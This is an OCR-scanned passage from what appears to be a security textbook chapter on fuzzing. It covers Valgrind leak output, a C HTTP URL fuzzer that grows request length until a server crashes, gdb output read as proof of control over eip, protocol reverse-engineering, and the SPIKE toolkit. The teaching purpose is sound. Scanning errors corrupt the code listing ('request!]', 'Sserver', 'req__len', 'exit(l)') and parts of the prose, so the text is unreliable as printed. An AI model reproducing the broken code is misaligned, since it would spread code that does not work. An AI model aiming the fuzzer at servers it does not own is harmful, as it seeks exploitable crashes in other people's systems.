at 0xD1693D: free (vg_replace_malloc . c : 231) 
by 0x80483C7: main (in valgrind_3) 

by 0xl26BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_3) 

Address 0x47BC07C is 0 bytes inside a block of size 160 free'd 
at 0xD1693D: free (vg_replace_malloc . c : 231) 
by 0x80483B9: main (in valgrind_3) 

by 0xl26BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_3) 

ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0) 
malloc/free: in use at exit: 40 bytes in 1 blocks, 
malloc/free: 2 allocs, 2 frees, 200 bytes allocated. 

For counts of detected errors, rerun with: -v 
searching for pointers to 1 not-freed blocks, 
checked 4664864 bytes. 

40 bytes in 1 blocks are definitely lost in loss record 1 of 1 
at 0xD1668E: malloc (vg_replace_malloc . c : 153) 
by 0x8048395: main (in valgrind_3) 

by 0xl26BBE: libc_start_main (in /lib/libc-2 . 3 . 2 . so) 

by 0x80482EC: (within valgrind_3) 

LEAK SUMMARY: 



==16584== 

==16584== 

==16584== 

==16584== 

==16584== 

==16584== 



definitely lost: 40 bytes in 1 blocks, 
possibly lost: 0 bytes in 0 blocks, 

still reachable: 0 bytes in 0 blocks, 
suppressed: 0 bytes in 0 blocks. 

Reachable blocks (those to which a pointer was found) 
To see them, rerun with: — show-reachable=yes 



are not shown . 



While the preceding examples are trivial, they do demonstrate the value of Valgrind 
as a testing tool. Should you choose to fuzz a program, Valgrind can be a critical piece 
of instrumentation that can help to quickly isolate memory problems, in particular 
heap-based buffer overflows, which manifest themselves as invalid reads and writes in 
Valgrind. 
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Fuzzing 

Black box testing works because you can apply some external stimulus to a program 
and observe how the program reacts to that stimulus. Monitoring tools give you the 
capability to observe the program's reactions. All that is left is to provide interesting 
inputs to the program being tested. As mentioned previously, fuzzing tools are de- 
signed for exactly this purpose, the rapid generation of input cases designed to induce 
errors in a program. Because the number of inputs that can be supplied to a program is 
infinite, the last thing you want to do is attempt to generate all of your input test cases 
by hand. It is entirely possible to build an automated fuzzer to step through every pos- 
sible input sequence in a brute-force manner and attempt to generate errors with each 
new input value. Unfortunately, most of those input cases would be utterly useless and 
the amount of time required to stumble across some useful ones would be prohibitive. 
The real challenge of fuzzer development is building them in such a way that they gen- 
erate interesting input in an intelligent, efficient manner. An additional problem is that 
it is very difficult to develop a generic fuzzer. To reach the many possible code paths for 
a given program, a fuzzer usually needs to be somewhat "protocol aware. " For example, 
a fuzzer built with the goal of overflowing query parameters in an HTTP request is un- 
likely to contain sufficient protocol knowledge to also fuzz fields in an SSH key ex- 
change. Also, the differences between ASCII and non-ASCII protocols make it more 
than a trivial task to port a fuzzer from one application domain to another. 




NOTE The Hypertext Transfer Protocol (HTTP) is an ASCII-based protocol 
described in RFC 2616. Secure Shell (SSH) is a binary protocol described in 
various Internet-Drafts. RFCs and Internet-Drafts are available online at 
www.ietf.org. 



Instrumented Fuzzing Tools and Techniques 

Fuzzing should generally be performed with some form of instrumentation in place. 
The goal of fuzzing is to induce an observable error condition in a program. Tools such 
as memory monitors and debuggers are ideally suited for use with fuzzers. For example, 
valgrind will report when a fuzzer has caused a program executing under valgrind con- 
trol to overflow a heap-allocated buffer. Debuggers will usually catch the fault induced 
when an invalid memory reference is made as a result of fuzzer-provided input. Follow- 
ing the observation of an error, the difficult job of determining whether the error is 
exploitable really begins. Exploitability determination will be discussed in the next 
chapter. 

A variety of fuzzing tools exist in both the open source and the commercial world. 
These tools range from stand-alone fuzzers to fuzzer development environments. In 
this chapter, we will discuss the basic approach to fuzzing, as well as introduce a fuzzer 
development framework. Chapters 23 and 25 will cover several more recent fuzzing 
tools, including fuzzers tailored to specific application domains. 
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A Simple URL Fuzzer 

As an introduction to fuzzers, we will look at a simple program for fuzzing web servers. 
Our only goal is to grow a long URL and see what effect it has on a target web server. 
The following program is not at all sophisticated, but it demonstrates several elements 
common to most fuzzers and will assist you in understanding more advanced 
examples: 



1 : 


/* 




2 : 


* simple 


: http fuzzer. c 


3: 


* 




4 : 


#include 


<stdio .h> 


5: 


#include 


<stdlib . h> 


6: 


#include 


<sys /socket .h> 


7 : 


#include 


<netinet/in .h> 



8: //maximum length to grow our url 
9: #def ine MAX_NAME_LEN 2048 
10: //max strlen of a valid IP address + null 
11: #def ine MAX_IP_LEN 16 

12: //static HTTP protocol content into which we insert fuzz string 
13: char request!] = "GET %*s.html HTTP/1 . l\r\nHost: %s\r\n\r\n"; 

14: int main(int argc, char **argv) { 

15: //buffer to build our long request 

16: char buf [MAX_NAME_LEN + sizeof (request) + MAX_IP_LEN] ; 

17 : //server address structure 

18: struct sockaddr_in server; 

19: int sock, len, req_len; 

20: if (argc != 2) { //require IP address on the command line 

21: fprintf ( stderr , "Missing server IP address\n"); 

22 exit ( 1 ) ; 

23: } 

24: memset ( Sserver , 0, sizeof (server) ) ; //clear the address info 

25: server . sin_family = AF_INET; //building an IPV4 address 

26: server . sin_port = htons(80); //connecting to port 80 

27: //convert the dotted IP in argv[l] into network representation 

28: if (inet_pton (AF_INET, argv[l], Sserver . sin_addr) <= 0) { 

29: fprintf (stderr, "Invalid server IP address: %s\n", argv[l]); 

30 : exit ( 1) ; 

31: } 

32: //This is the basic fuzzing loop. We loop, growing the url by 

33: // 4 characters per pass until an error occurs or we reach MAX_NAME_LEN 

34: for (len = 4; len < MAX_NAME_LEN; len += 4 ) { 

35: //first we need to connect to the server, create a socket... 

36: sock = socket (AF_INET, S OCK_S TREAM , 0) ; 

37 : if (sock == -1 ) { 

38: fprintf (stderr, "Could not create socket, quitting\n") ; 

39 : exit (1 ) ; 

40: } 

41: //and connect to port 80 on the web server 

42: if (connect (sock, (struct sockaddr* ) Sserver , sizeof (server) ) ) { 

43: fprintf (stderr, "Failed connect to %s, quitting\n", argv[l]); 

44 : close (sock) ; 
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45: exit(l); //terminate if we can't connect 

46: } 

47: //build the request string. Request really only reserves space for 

48: //the name field that we are fuzzing (using the * format specifier) 

49: req__len = snprintf (buf , sizeof(buf), request, len, "A", argv[l]); 

50: //this actually copies the growing number of A's into the request 

51: memset(buf + 4, 'A', len); 

52: //now send the request to the server 

53: send (sock, buf, req_len, 0); 

54: //try to read the server response, for simplicity's sake let's assume 

55: //that the remote side choked if no bytes are read or a recv error 

56: //occurs 

57: if (read(sock, buf, sizeof (buf) , 0) <= 0) { 

58: fprintf (stderr, "Bad recv at len = %d\n", len) ; 

59: close (sock); 

60: break; //a recv error occurred, report it and stop looping 

61: } 

62: close (sock); 

63: } 

64: return 0; 

65: } 

The essential elements of this program are its knowledge, albeit limited, of the 
HTTP protocol contained entirely in line 13, and the loop in lines 34-63 that sends a 
new request to the server being fuzzed after generating a new larger filename for each 
pass through the loop. The only portion of the request that changes between connec- 
tions is the fdename field (%*s) that gets larger and larger as the variable len increases. 
The asterisk in the format specifier instructs the snprintf() function to set the length 
according to the value specified by the next variable in the parameter list, in this case 
len. The remainder of the request is simply static content required to satisfy parsing 
expectations on the server side. As len grows with each pass through the loop, the 
length of the filename passed in the requests grows as well. Assume for example 
purposes that the web server we are fuzzing, bad_httpd, blindly copies the filename 
portion of a URL into a 256-byte, stack-allocated buffer. You might see output such as 
the following when running this simple fuzzer: 

# . /simple_http_fuzzer 127.0.0.1 

# Bad recv at len = 276 

From this output, you might conclude that the server is crashing when you grow 
your filename to 276 characters. With appropriate debugger output available, you might 
also find out that your input overwrites a saved return address and that you have the 
potential for remote code execution. For the previous test run, a core dump from the 
vulnerable web server shows the following: 

# gdb bad_httpd core. 16704 

Core was generated by ' . /bad_httpd ' . 

Program terminated with signal 11, Segmentation fault. 

#0 0x006c6d74 in ?? () 
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This tells you that the web server terminated because of a memory access violation 
and that execution halted at location 0x006c6d74, which is not a typical program ad- 
dress. In fact, with a little imagination, you realize that it is not an address at all, but the 
string "tml". It appears that the last 4 bytes of the filename buffer have been loaded into 
eip, causing a segmentation fault. Since you can control the content of the URL, you can 
likely control the content of eip as well, and you have found an exploitable problem. 

Note that this fuzzer does exactly one thing: it submits a single long fdename to a 
web server. A more interesting fuzzer might throw additional types of input at the target 
web server, such as directory traversal strings. Any thoughts of building a more sophis- 
ticated fuzzer from this example must take into account a variety of factors, such as: 

• What additional static content is required to make new requests appear to be 
valid? What if you wanted to fuzz particular HTTP request header fields, for 
example? 

• Additional checks imposed on the recv operation to allow graceful failure of 
recv operations that time out. Possibilities include setting an alarm or using 
the select function to monitor the status of the socket. 

• Accommodating more than one fuzz string. 

As an example, consider the following URL: 

http : //gimme .money. com/cgi-bin/login?user=smith&password=smithpass 

What portions of this request might you fuzz? It is important to identify those por- 
tions of a request that are static and those parts that are dynamic. In this case, the sup- 
plied request parameter values smith and smithpass are logical targets for fuzzing, but 
they should be fuzzed independently from each other, which requires either two sepa- 
rate fuzzers (one to fuzz the user parameter and one to fuzz the password parameter) 
or a single fuzzer capable of fuzzing both parameters at the same time. A multivariable 
fuzzer requires nested iteration over all desired values of each variable being fuzzed, 
and is therefore somewhat more complex to build than the simple single-variable fuzz- 
er in the example. 

Fuzzing Unknown Protocols 

Building fuzzers for open protocols is often a matter of sitting down with an RFC and 
determining static protocol content that you can hard-code and dynamic protocol con- 
tent that you may want to fuzz. Static protocol content often includes protocol-defined 
keywords and tag values, while dynamic protocol content generally consists of user- 
supplied values. How do you deal with situations in which an application is using a 
proprietary protocol whose specifications you don't have access to? In this case, you 
must reverse-engineer the protocol to some degree if you hope to develop a useful 
fuzzer. The goals of the reverse engineering effort should be similar to your goals in 
reading an RFC: identifying static versus dynamic protocol fields. Without resorting to 
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reverse-engineering a program binary, one of the few ways you can hope to learn about 
an unknown protocol is by observing communications to and from the program. Net- 
work sniffing tools might be very helpful in this regard. The WireShark network moni- 
toring tool, for example, can capture all traffic to and from an application and display 
it in such a way as to isolate the application layer data that you want to focus on. Initial 
development of a fuzzer for a new protocol might simply build a fuzzer that can mim- 
ic a valid transaction that you have observed. As protocol discovery progresses, the 
fuzzer is modified to preserve known static fields while attempting to mangle known 
dynamic fields. The most difficult challenges are faced when a protocol contains de- 
pendencies among fields. In such cases, changing only one field is likely to result in an 
invalid message being sent from the fuzzer to the server. A common example of such 
dependencies is embedded length fields, as shown in this simple HTTP POST request: 

POST /cgi -bin /login . pi HTTP/1.1 
Host: gimme.money.com 
Connection: close 
User-Agent: Mozilla/6.0 
Content-Length: 29 

Content-Type : application/x-www-form-encoded 
user=smith&password=smithpass 

In this case, if you want to fuzz the user field, then each time you change the length 
of the user value, you must be sure to update the length value associated with the 
Content-Length header. This somewhat complicates fuzzer development, but it must 
be properly handled so that your messages are not rejected outright by the server simply 
for violating the expected protocol. 

SPIKE 

SPIKE is a fuzzer creation toolkit/API developed by Dave Aitel of Immunity, Inc. SPIKE 
provides a library of C functions for use by fuzzer developers. Only Dave would call 
SPIKE pretty, but it was one of the early efforts to simplify fuzzer development by pro- 
viding buffer construction primitives useful in many fuzzing situations. SPIKE is de- 
signed to assist in the creation of network-oriented fuzzers and supports sending data 
via TCP or UDP. Additionally, SPIKE provides several example fuzzers for protocols 
ranging from HTTP to Microsoft Remote Procedure Call (MSRPC). SPIKE libraries can 
be used to form the foundation of custom fuzzers, or SPIKE's scripting capabilities can 
be used to rapidly develop fuzzers without requiring detailed knowledge of C program- 
ming. 

The SPIKE API centers on the notion of a "spike" data structure. Various API calls are 
used to push data into a spike and ultimately send the spike to the application being 
fuzzed. Spikes can contain static data, dynamic fuzzing variables, dynamic length val- 
ues, and grouping structures called blocks. A SPIKE "block" is used to mark the begin- 
ning and end of data whose length should be computed. Blocks and their associated 
length fields are created with name tags. Prior to sending a spike, the SPIKE API handles 
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